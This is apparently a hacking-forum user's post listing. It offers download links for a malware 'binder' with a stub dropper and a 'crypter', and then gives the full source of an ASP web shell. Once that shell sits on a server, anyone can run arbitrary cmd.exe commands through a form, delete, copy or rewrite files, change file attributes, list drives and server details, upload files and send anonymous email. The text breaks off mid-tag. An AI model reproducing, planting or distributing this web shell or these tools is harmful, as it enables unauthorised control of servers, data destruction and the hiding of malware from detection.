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Everything posted by Ras

  1. X-Binder 1.1 Coded by: x-zer0 Compiler: Delphi 7 Date Released: 10.oktm.2007 Tested on: Windows XP SP2 Features: - Support an unlimited amount of files to bind - Support the most of all files ( *.exe ; *.jpg ; *.mp3 ; *.gif ….) - Stub dropper - Windows Directory - Stub Size ( 18kb ) Download: http://rapidshare.com/files/61900553/X-Binder.rar
  2. X-Crypter 1.0 Coded by: x-zer0 2007 Compiler: Delphi 7 Download: http://rapidshare.com/files/61898397/X-Crypter.rar
  3. Link: http://security-frog.org/hack/ Bafta!
  4. <%@ Language=VBScript %> <%Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form(".CMD") If (szCMD <> "") Then szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If%> <% if request.form("flag")=""then %> <html> <head> <title>::: ELMALISEKER :::</title> <% 'Commands dim fs,f dim FilePath,FolderPath,FileTo,Cmd dim selFolder,FolderTo dim Tempmsg dim TempAtt dim TextOutput,TextWrite,TextFile,lblioMode,lblFormat,TextCreateFormat Const ForReading = 1, ForWriting = 2, ForAppending = 3 Set fs = CreateObject("Scripting.FileSystemObject") FilePath=Request.Form("FileName") FolderPath=Request.Form("FolderPath") selFolder=Request.Form("FolderName") FolderTo=Request.form("CopyFolderTo") FileTo=Request.Form("CopyFileTo") Cmd=Request.Form("cmdOption") TextCmd=Request.form("cmdtxtFileOption") Select case Cmd case "DeleteFile" fs.deletefile FilePath,TRUE response.write("File: " & FilePath & " has been deleted.") case "DeleteFolder" fs.deletefolder selFolder,TRUE response.write("Folder: " & selFolder & " has been deleted.") FolderPath=Request.form("RefreshFolderPath") case "CopyFile" fs.CopyFile FilePath,FileTo, TRUE response.write("File: " & FilePath & " has been copied to " & FileTo & ".") case "CopyFolder" fs.CopyFolder selFolder,FolderTo, TRUE response.write("Folder: " & selFolder & " has been copied to " & FolderTo & ".") case "SetFileAttributes" on error resume next if FilePath <> "" then Set f = fs.GetFile(FilePath) select case f.attributes case 0 FileAttributes = "Normal" case 1 FileAttributes = "Read Only" case 2 FileAttributes = "Hidden" case 3 'Extra FileAttributes = "Read Only, Hidden" case 4 FileAttributes = "System" case 7 'Extra FileAttributes = "Read Only, Hidden, System" case 8 FileAttributes = "Volume" case 16 FileAttributes = "Directory" case 19 FileAttributes = "Read Only, Hidden, Directoy" case 23 FileAttributes = "Read Only, Hidden, System, Directory" case 32 FileAttributes = "Archive" case 33 'Extra FileAttributes = "Read Only, Archive" case 34 'Extra FileAttributes = "Hidden, Archive" case 38 'Extra FileAttributes = "Hidden, Archive, System" case 39 'Extra FileAttributes = "Read Only, Hidden, Archive, System" case 48 FileAttributes = "Directory, Archive" case 64 FileAttributes = "Alias" case 128 FileAttributes = "Compressed" case else FileAttributes = f.attributes end select end if response.write("<form name=frmFileAttributes action=elmaliseker.asp method=post>") response.write("<input type=hidden name=FileName Value=" & chr(34) & FilePath & chr(34) & ">") response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">") response.write("<center><Table border=5 cellpadding=3 bordercolor=#ffffff>") response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>File Name: " & f.name & "</td>") response.write("<td rowspan=5><center><u>[b]Set New Attributes:[/b]</u></center>") response.write("<input type=checkbox name=FileAttribute1 value=0 checked>Normal") response.write(" <input type=checkbox name=FileAttribute2 value=1>Read Only") response.write(" <input type=checkbox name=FileAttribute3 value=2>Hidden") response.write(" <input type=checkbox name=FileAttribute4 value=4>System") response.write(" <input type=checkbox name=FileAttribute5 value=8>Volume") response.write(" <input type=checkbox name=FileAttribute6 value=16>Directory") response.write(" <input type=checkbox name=FileAttribute7 value=32>Archive") response.write(" <input type=checkbox name=FileAttribute8 value=64>Alias") response.write(" <input type=checkbox name=FileAttribute9 value=128>Compressed") response.write(" <center><input type=submit name=cmdOption value=ApplyFileAttributes></center>") response.write("</td></tr>") response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of File: " & f.type & "</td></tr>") response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path) response.write(" Size: " & FormatNumber(f.size/1024, 2) & "KB (" & f.size & " bytes)</td></tr>") if f.DateCreated = "" then response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----") else response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated) end if if f.DateLastAccessed = "" then response.write(" Modified: ----") else response.write(" Modified: " & f.DateLastAccessed) end if if f.DateLastModified = "" then response.write(" Accessed: ----</td></tr>") else response.write(" Accessed: " & f.DateLastModified & "</td></tr>") end if response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FileAttributes & "</td></tr>") response.write("</table></center></form>") case "SetFolderAttributes" on error resume next FolderPath=Request.form("RefreshFolderPath") if selFolder <> "" then Set f = fs.Getfolder(selFolder) select case f.attributes case 0 FolderAttributes = "Normal" case 1 FolderAttributes = "Read Only" case 2 FolderAttributes = "Hidden" case 3 'Extra FolderAttributes = "Read Only, Hidden" case 4 FolderAttributes = "System" case 7 'Extra FolderAttributes = "Read Only, Hidden, System" case 8 FolderAttributes = "Volume" case 16 FolderAttributes = "Directory" case 17 'Extra FolderAttributes = "Read Only, Directory" case 18 'Extra FolderAttributes = "Hidden, Directory" case 19 FolderAttributes = "Read Only, Hidden, Directoy" case 20 'Extra FolderAttributes = "System, Directory" case 22 'Extra FolderAttributes = "Hidden, System. Directory" case 23 FolderAttributes = "Read Only, Hidden, System, Directory" case 32 FolderAttributes = "Archive" case 33 'Extra FolderAttributes = "Read Only, Archive" case 34 'Extra FolderAttributes = "Hidden, Archive" case 38 'Extra FolderAttributes = "Hidden, Archive, System" case 39 'Extra FolderAttributes = "Read Only, Hidden, Archive, System" case 48 FolderAttributes = "Directory, Archive" case 64 FolderAttributes = "Alias" case 128 FolderAttributes = "Compressed" case else FolderAttributes = f1.attributes end select end if response.write("<form name=frmFolderAttributes action=elmaliseker.asp method=post>") response.write("<input type=hidden name=FolderName Value=" & chr(34) & selFolder & chr(34) & ">") response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">") response.write("<center><Table border=5 cellpadding=3 cellspacing=1 bordercolor=#ffffff>") response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Folder Name: " & f.name & "</td>") response.write("<td rowspan=5><center><u>[b]Set New Attributes:[/b]</u></center>") response.write("<input type=checkbox name=FolderAttribute1 value=0 checked>Normal") response.write(" <input type=checkbox name=FolderAttribute2 value=1>Read Only") response.write(" <input type=checkbox name=FolderAttribute3 value=2>Hidden") response.write(" <input type=checkbox name=FolderAttribute4 value=4>System") response.write(" <input type=checkbox name=FolderAttribute5 value=8>Volume") response.write(" <input type=checkbox name=FolderAttribute6 value=16>Directory") response.write(" <input type=checkbox name=FolderAttribute7 value=32>Archive") response.write(" <input type=checkbox name=FolderAttribute8 value=64>Alias") response.write(" <input type=checkbox name=FolderAttribute9 value=128>Compressed") response.write(" <center><input type=submit name=cmdOption value=ApplyFolderAttributes></center>") response.write("</td></tr>") response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of Folder: " & f.type & "</td></tr>") response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path) response.write(" Size: " & FormatNumber(f.size/1024, 2) & "KB (" & f.size & " bytes)</td></tr>") if f.DateCreated = "" then response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----") else response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated) end if if f.DateLastAccessed = "" then response.write(" Modified: ----") else response.write(" Modified: " & f.DateLastAccessed) end if if f.DateLastModified = "" then response.write(" Accessed: ----</td></tr>") else response.write(" Accessed: " & f.DateLastModified & "</td></tr>") end if response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FolderAttributes & "</td></tr>") response.write("</table></center></form>") case "OpenTextFile" If FilePath <> "" then lblioMode=Request.form("optiomode") lblFormat=request.form("optformat") set TextFile = fs.OpenTextFile (FilePath, lblioMode, lblFormat) TextOutput = TextFile.ReadAll 'TextOutput="" 'Do While TextFile.AtEndOfStream <> True ' TextOutput = TextOutput & TextFile.ReadLine 'Loop TextFile.close else FilePath = FolderPath end if response.write("<form name=frmTextFile action=elmaliseker.asp method=post>") response.write("<center><table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff width=100% height=100% >") response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOption value=SaveAs><input type=text size=77 name=FileName value=" & chr(34) & FilePath & chr(34) & "><select name=optUnicode><option value=FALSE>ASCII <option value=TRUE>Unicode</select></td></tr>") response.write("<tr><td bgcolor=#ffffff><center><textarea name=txtFile rows=20 cols=85>" & TextOutput & "</textarea></center></td></tr>") response.write(chr(13)) response.write(chr(13)) response.write(chr(13)) response.write(chr(13)) response.write("<ERROR: THIS IS NOT A TEXT FILE>") response.write(chr(13)) response.write("<FilePath: " & FilePath & ">") response.write(chr(13)) response.write("<ioMode: " & lblioMode & ">") response.write(chr(13)) response.write("<Format: " & lblFormat & ">") response.write(chr(13)) response.write(chr(13)) response.write(chr(13)) response.write(chr(13)) response.write("<tr><td><input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & "></td></tr>") response.write("</table></center> ") case "ApplyFileAttributes" TempAtt=int(Request.form("FileAttribute1")) TempAtt=TempAtt + int(Request.form("FileAttribute2")) TempAtt=TempAtt + int(Request.form("FileAttribute3")) TempAtt=TempAtt + int(Request.form("FileAttribute4")) TempAtt=TempAtt + int(Request.form("FileAttribute5")) TempAtt=TempAtt + int(Request.form("FileAttribute6")) TempAtt=TempAtt + int(Request.form("FileAttribute7")) TempAtt=TempAtt + int(Request.form("FileAttribute8")) TempAtt=TempAtt + int(Request.form("FileAttribute9")) Set f = fs.GetFile(FilePath) f.attributes=int(TempAtt) response.write("File: " & FilePath & " attributes have been changed.") case "ApplyFolderAttributes" FolderPath=Request.form("RefreshFolderPath") TempAtt=int(Request.form("FolderAttribute1")) TempAtt=TempAtt + int(Request.form("FolderAttribute2")) TempAtt=TempAtt + int(Request.form("FolderAttribute3")) TempAtt=TempAtt + int(Request.form("FolderAttribute4")) TempAtt=TempAtt + int(Request.form("FolderAttribute5")) TempAtt=TempAtt + int(Request.form("FolderAttribute6")) TempAtt=TempAtt + int(Request.form("FolderAttribute7")) TempAtt=TempAtt + int(Request.form("FolderAttribute8")) TempAtt=TempAtt + int(Request.form("FolderAttribute9")) Set f = fs.Getfolder(selFolder) f.attributes=int(TempAtt) response.write("Folder: " & selFolder & " attributes have been changed.") end select Select Case TextCmd case "SaveAs" TextWrite = Request.form("txtFile") TextCreateFormat = Request.form("optUnicode") if textcreateformat = "TRUE" then tempmsg="Unicode" else tempmsg="ASCII" end if Set TextFile = fs.CreateTextFile(FilePath, True, TextCreateFormat) TextFile.Write TextWrite TextFile.Close response.write("File: " & FilePath & " Format: " & tempmsg & " has been saved.") end select %> <% Public CurrentPath Function ShowDriveLetters() on error resume next Dim fs, d, dc, t dim isReadyColor,TempSize,ShowDriveInfo Set fs = CreateObject("Scripting.FileSystemObject") Set dc = fs.Drives ShowDriveInfo=Request.Form("chkShowDriveInfo") response.write("<form name=lstDrives action=elmaliseker.asp method=post>") response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>") if showdriveinfo="TRUE" then response.write("<tr colspan=8><td align=center colspan=8 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE> Show Drive Info </td></tr>") response.write("<td align=center bgcolor=#f8f8ff><font color=#000000>[b]<u>File System</u>[b]</td>") response.write("<td align=center bgcolor=#f8f8ff><font color=#000000>[b]<u>Serial #</u>[b]</td>") else response.write("<tr colspan=2><td align=center colspan=2 bgcolor=#f8f8ff><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE>Show Drive Info</td></tr>") end if response.write("<td align=center bgcolor=#f8f8ff><font color=#000000>[b]<u>Type</u>[b]</td>") response.write("<td align=center bgcolor=#f8f8ff><font color=#000000>[b]<u>Drive</u>[b]</td>") if showdriveinfo="TRUE" then response.write("<td align=center bgcolor=#f8f8ff><font color=#000000>[b]<u>Volume Name</u>[b]</td>") response.write("<td align=center bgcolor=#f8f8ff><font color=#000000>[b]<u>Share Name</u>[b]</td>") response.write("<td align=center bgcolor=#f8f8ff><font color=#000000>[b]<u>Free Space</u>[b]</td>") response.write("<td align=center bgcolor=#f8f8ff><font color=#000000>[b]<u>Total Size</u>[b]</td>") end if response.write("</tr>") For Each d in dc Select Case d.DriveType Case 0: t = "Unknown" Case 1: t = "Removable" Case 2: t = "Fixed" Case 3: t = "Network" Case 4: t = "CD-ROM" Case 5: t = "RAM Disk" End Select if showdriveinfo="TRUE" then if d.isReady then response.write("<TR bgcolor=#000000>") else response.write("<TR bgcolor=#191970>") end if if d.filesystem = "" then response.write("<td align=center>....</td>") else response.write("<td align=center>" & d.filesystem & "</td>") end if if d.SerialNumber = "" then response.write("<td align=center>....</td>") else response.write("<td align=center>" & d.SerialNumber & "</td>") end if else response.write("<TR>") end if response.write("<td align=center>" & t & "</td>") response.write("<td align=center><input type=submit name=FolderPath value=" & d.driveletter & ":\></td>") if showdriveinfo="TRUE" then if d.volumename="" then response.write("<td align=center>....</td>") else response.write("<td align=center>" & d.volumename & "</td>") end if if d.sharename="" then response.write("<td align=center>....</td>") else response.write("<td align=center>" & d.sharename & "</td>") end if str="" str=str & d.driveletter str=str & ":" 'response.write(str) if d.isready then freespace = (d.AvailableSpace / 1048576) set sp=fs.getdrive(str) response.write("<td align=center>" & Round(freespace,1) & " MB</td>") else response.write("<td align=center>....</td>") end if str="" str=str & d.driveletter str=str & ":" 'response.write(str) if d.isready then totalspace = (d.TotalSize / 1048576) set sp=fs.getdrive(str) response.write("<td align=center>" & Round(totalspace,1) & " MB</td>") else response.write("<td align=center>....</td>") end if end if Next response.write("</tr>") response.write("</tr></table>") response.write("</form>") End Function Function ShowFolderNames() on error resume next Dim fs, f, f1, s, sf ,FP dim ShowFolderInfo,FolderAttributes ShowFolderInfo=request.form("chkShowFolderInfo") FP=Request.Form("FolderPath") if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then FP=request.form("RefreshFolderPath") IP=chr(34) & IP & chr(34) end if CurrentPath=FP Set fs = CreateObject("Scripting.FileSystemObject") Set f = fs.GetFolder(FP) Set sf = f.SubFolders response.write("<form name=lstFolders action=elmaliseker.asp method=post>") response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>") response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=Submit name=FolderPath value=RefreshFolder></td></tr>") response.write("<input type=hidden name=RefreshFolderPath value=" & chr(34) & fp & chr(34) & ">") response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowFolderInfo value=TRUE> Show Folder Info</td></tr>") response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFolder> <input type=submit name=cmdOption Value=CopyFolder> to <input type=text name=CopyFolderTo></td></tr>") response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFolderAttributes>") if showfolderinfo="TRUE" then response.write("<TR>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Folder</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Size</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Type</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Attributes</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Created</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Last Accessed</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Last Modified</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Short Name</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Short Path</u>[/b]</td>") response.write("</tr>") end if For Each f1 in sf if showfolderinfo="TRUE" then response.write("<tr>") response.write("<td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td>") response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0) & " kb</td>") response.write("<td align=center nowrap>" & f1.type & "</td>") folderattributes="...." select case f1.attributes case 0 FolderAttributes = "Normal" case 1 FolderAttributes = "Read Only" case 2 FolderAttributes = "Hidden" case 3 'Extra FolderAttributes = "Read Only, Hidden" case 4 FolderAttributes = "System" case 7 'Extra FolderAttributes = "Read Only, Hidden, System" case 8 FolderAttributes = "Volume" case 16 FolderAttributes = "Directory" case 17 'Extra FolderAttributes = "Read Only, Directory" case 18 'Extra FolderAttributes = "Hidden, Directory" case 19 FolderAttributes = "Read Only, Hidden, Directoy" case 20 'Extra FolderAttributes = "System, Directory" case 22 'Extra FolderAttributes = "Hidden, System. Directory" case 23 FolderAttributes = "Read Only, Hidden, System, Directory" case 32 FolderAttributes = "Archive" case 33 'Extra FolderAttributes = "Read Only, Archive" case 34 'Extra FolderAttributes = "Hidden, Archive" case 38 'Extra FolderAttributes = "Hidden, Archive, System" case 39 'Extra FolderAttributes = "Read Only, Hidden, Archive, System" case 48 FolderAttributes = "Directory, Archive" case 64 FolderAttributes = "Alias" case 128 FolderAttributes = "Compressed" case else FolderAttributes = f1.attributes end select response.write("<td align=center nowrap>" & FolderAttributes & "</td>") if f1.datecreated = "" then response.write("<td align=center nowrap>....</td>") else response.write("<td align=center nowrap>" & f1.datecreated & "</td>") end if if f1.datelastaccessed = "" then response.write("<td align=center nowrap>....</td>") else response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>") end if if f1.datelastmodified = "" then response.write("<td align=center nowrap>....</td>") else response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>") end if response.write("<td align=center nowrap>" & f1.shortname & "</td>") response.write("<td align=center nowrap>" & f1.shortpath & "\</td></tr>") else response.write("<tr><td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td></tr>") end if Next response.write("</table>") response.write("</form>") End Function Function ShowFileNames() on error resume next Dim fs, f, f1, fc, FP dim ShowFileInfo,FileAttributes,ShowPrefix ShowPrefix=request.form("txtShowPrefix") ShowFileInfo=Request.form("chkShowFileInfo") FP=Request.Form("FolderPath") if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then FP=request.form("RefreshFolderPath") IP=chr(34) & IP & chr(34) end if CurrentPath=FP Set fs = CreateObject("Scripting.FileSystemObject") Set f = fs.GetFolder(FP) Set fc = f.Files response.write("<form name=lstFiles action=elmaliseker.asp method=post>") response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>") response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=submit value=RefreshFiles> <input type=checkbox name=chkShowFileInfo value=TRUE> Show File Info & Show Only: <input type=text name=txtShowPrefix value= ></td></tr>") response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFile><input type=submit name=cmdOption Value=CopyFile> to <input type=text name=CopyFileTo></td></tr>") response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=OpenTextFile><select name=optioMode><option value=" & chr(34) & "1" & chr(34) & ">For Reading <option value="& chr(34) & "2" & chr(34) & ">For Writing <option value=" & chr(34) & "8" & chr(34) & ">For Appending</select><select name=optformat><option value=" & chr(34) & "-2" & chr(34) & ">System Default <option value=" & chr(34) & "-1" & chr(34) & ">Unicode <option value=" & chr(34) & "0" & chr(34) & ">ASCII</select></td>") response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFileAttributes>") response.write("<input type=hidden name=FolderPath Value=" & chr(34) & fp & chr(34) & "></tr>") if showfileinfo="TRUE" then response.write("<TR>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>File</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Size</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Type</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Attributes</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Created</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Last Accessed</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Last Modified</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Short Name</u>[/b]</td>") response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000>[b]<u>Short Path</u>[/b]</td>") response.write("</tr>") end if For Each f1 in fc if showfileinfo="TRUE" then if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then response.write("<tr>") response.write("<td align=center nowrap><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td>") response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0) & " kb</td>") response.write("<td align=center nowrap>" & f1.type & "</td>") select case f1.attributes case 0 FileAttributes = "Normal" case 1 FileAttributes = "Read Only" case 2 FileAttributes = "Hidden" case 3 'Extra FileAttributes = "Read Only, Hidden" case 4 FileAttributes = "System" case 7 'Extra FileAttributes = "Read Only, Hidden, System" case 8 FileAttributes = "Volume" case 16 FileAttributes = "Directory" case 19 FileAttributes = "Read Only, Hidden, Directoy" case 23 FileAttributes = "Read Only, Hidden, System, Directory" case 32 FileAttributes = "Archive" case 33 'Extra FileAttributes = "Read Only, Archive" case 34 'Extra FileAttributes = "Hidden, Archive" case 38 'Extra FileAttributes = "Hidden, Archive, System" case 39 'Extra FileAttributes = "Read Only, Hidden, Archive, System" case 48 FileAttributes = "Directory, Archive" case 64 FileAttributes = "Alias" case 128 FileAttributes = "Compressed" case else FileAttributes = f1.attributes end select response.write("<td align=center nowrap>" & FileAttributes & "</td>") if f1.datecreated = "" then response.write("<td align=center nowrap>....</td>") else response.write("<td align=center nowrap>" & f1.datecreated & "</td>") end if if f1.datelastaccessed = "" then response.write("<td align=center nowrap>....</td>") else response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>") end if if f1.datelastmodified = "" then response.write("<td align=center nowrap>....</td>") else response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>") end if response.write("<td align=center nowrap>" & f1.shortname & "</td>") response.write("<td align=center nowrap>" & f1.shortpath & "</td></tr>") end if else if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then response.write("<tr><td><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td></tr>") end if end if Next response.write("</table>") response.write("</form>") End Function %> <STYLE> BODY {scrollbar-face-color: #f8f8ff; scrollbar-shadow-color: #cccccc; scrollbar-highlight-color: #cccccc; scrollbar-3dlight-color: #cccccc; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000; scrollbar-arrow-color: #000000} </STYLE> </head> <body bgcolor=#000000 text=#00FF00> <center> <font color="#00FF00">NTDADDY BU BIR ELMALI SEKERDIR;) YILLARDIR BUYUK BABALAR TARAFINDAN BILINMESINE RAGMEN DAGITILMIYORDU AMA BUGUN AHA SIZ EVLATLARIMIZA VERIYOZ CUNKU BIZ BUNUN BABASINI YAPTIK BU DA SIZIN OLSUN</p></font> <hr color="#ffffff"> <table border=1 width="100%" color="#fffff"> <tr> <td align=center width=100% bgcolor=#ffffff><font color=#00FF00><a name=lblCurrentPath value= <% FP=Request.Form("FolderPath") if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then FP=request.form("RefreshFolderPath") end if response.write(chr(34) & IP & chr(34) & ">" & FP) %> </a></td> </tr> </table> <table border=0 cellspacing=1 bordercolor="#ffffff" width=100% height=100%> <tr colspan=3><td align=left colspan=3><% =ShowDriveLetters() %></td> <td align=center></td></tr> <tr valign=top width=100%><td align=left><% =ShowFolderNames() %></td> <td align=right><% =ShowFileNames() %></td> </tr> </table> <font color="#00FF00"> </font><hr color="#ffffff"><font color="#00FF00"> </font> <table cellpadding="3" cellspacing="3" border="5" bordercolor="#ffffff"> <tr> <td align="left" bgcolor="#F8F8FF"> <font color="#00FF00" size="4">[b]• Remote Info.[/b]</font><font color="#00FF00"> </font> </td> <td align="left" bgcolor="#F8F8FF"> <font color="#00FF00" size="4">[b]• Local Info.[/b]</font><font color="#00FF00"> </font> </td> </tr> <tr> <td align=left> <div align=left><font size="3" color="#00FF00"> [b]User[/b]: <%= "\\" & oScriptNet.ComputerName & " \ " & oScriptNet.UserName %> [b]ID[/b]: <%=request.servervariables("SERVER_NAME")%> [b]IP[/b]: <%=request.servervariables("LOCAL_ADDR")%> [b]HTTPD[/b]: <%=request.servervariables("SERVER_SOFTWARE")%> [b]Port[/b]: <%=request.servervariables("SERVER_PORT")%> [b]Webroot[/b]: <%=request.servervariables("APPL_PHYSICAL_PATH")%> [b]LogRoot[/b]: <%=request.servervariables("APPL_MD_PATH")%> [b]Date[/b]: <% =date() %> [b]Time[/b]: <%=time() %> [b]HTTPs[/b]: <%=request.servervariables("HTTPS")%> </font></div> </td> <td align="left" valign="top"> <font color="#00FF00"> [b]Local Addr (What they see.)[/b]: <%=request.servervariables("REMOTE_ADDR")%> [b]Forwarded from[/b] : <%=request.servervariables("HTTP_X_FORWARDED_FOR")%> [b]Via[/b]: <%=request.servervariables("HTTP_VIA")%> [b]User Agent[/b]: <%=request.servervariables("HTTP_USER_AGENT")%> [b]Wookie[/b]: <%=request.servervariables("HTTP_WOOKIE")%> [b]Cache Control[/b]: <%=request.servervariables("HTTP_CACHE_CONTROL")%> [b]Interface[/b]: <%=request.servervariables("GATEWAY_INTERFACE")%> [b]Protocol[/b]: <%=request.servervariables("SERVER_PROTOCOL")%> [b]Method[/b]: <%=request.servervariables("REQUEST_METHOD")%> </font> </td> </tr> </table> <font color="#00FF00"> </font> <hr color="#ffffff"> <font color="#00FF00"> </font> <table cellpadding="3" cellspacing"1" bordercolor="#F8F8FF" border=5> <tr> <td align="left" bgcolor="#F8F8FF"> <font size="2" color="#00FF00">[b]• File Upload Utility[/b]</font></td> </tr> <tr> <td align="left"> <form method=post ENCTYPE="multipart/form-data"> <font color="#00FF00"> [b]File[/b] : <input type="file" size="35" name="File1"> <input type="submit" Name="Action" value="Upload the file"> </font> </form></td> </tr> <tr> <td align="left" bgcolor="#F8F8FF"> <font size="2" color="#00FF00">[b]• RAW D.O.S. COMMAND INTERFACE[/b]</font></td> </tr> <tr valign="top"> <td align="left"> <form action="<%= Request.ServerVariables("URL") %>" method="POST"> <font color="#00FF00"><input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="submit" value="Run"> </font> </p> </form> <pre><font color="#00FF00"><% If (IsObject(oFile)) Then On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) oFile.Close Call oFileSys.DeleteFile(szTempFile, True) End If%> </font></pre> </td> </tr> </table> <font color="#00FF00"> </font> <hr color="#ffffff"> <font color="#00FF00"> </font> <form action=elmaliseker.asp method=post> <form action=elmaliseker.asp method=post> <table border=3 cellpadding="3" cellspacing="2" bordercolor="#ffffff" width="400"> <tr> <td bgcolor="#F8F8FF" colspan="2"><font color="#00FF00" align="left">[b]• Anonymous Email Utility[/b]</font></td> <tr> <td bgcolor="#F8F8FF"><font color="#00FF00">[b]From:[/b] </font> </td> <td><font color="#00FF00"><input name=From size=30 style="HEIGHT: 22px; WIDTH: 321px"></font></td></tr> <tr> <td bgcolor="#F8F8FF"><font color="#00FF00">[b]To:[/b] </font> </td> <td><font color="#00FF00"><input name=To size=30 style="HEIGHT: 22px; WIDTH: 321px"></font></td></tr> <tr> <td bgcolor="#F8F8FF"><font color="#00FF00">[b]Subject:[/b] </font> </td> <td><font color="#00FF00"><input name=Subject size=30 style="HEIGHT: 22px; WIDTH: 321px"></font></td></tr> <tr> <td valign="top" bgcolor="#F8F8FF"><font color="#00FF00">[b]Body:[/b] </font> </td> <td><font color="#00FF00"><textarea cols=30 name=Body rows=5 style="HEIGHT: 86px; WIDTH: 322px" wrap=virtual></textarea></font></td> </tr> <tr> <td align="right" bgcolor="#F8F8FF" colspan="2"> <font color="#00FF00"> <input type="submit" value="Send Mail"> <input type="hidden" name="flag" value="1"></font></td> </tr> </table> <font color="#00FF00"> </font> <hr color="#ffffff"> <font size="#ffffff"><center></center> </font> <font 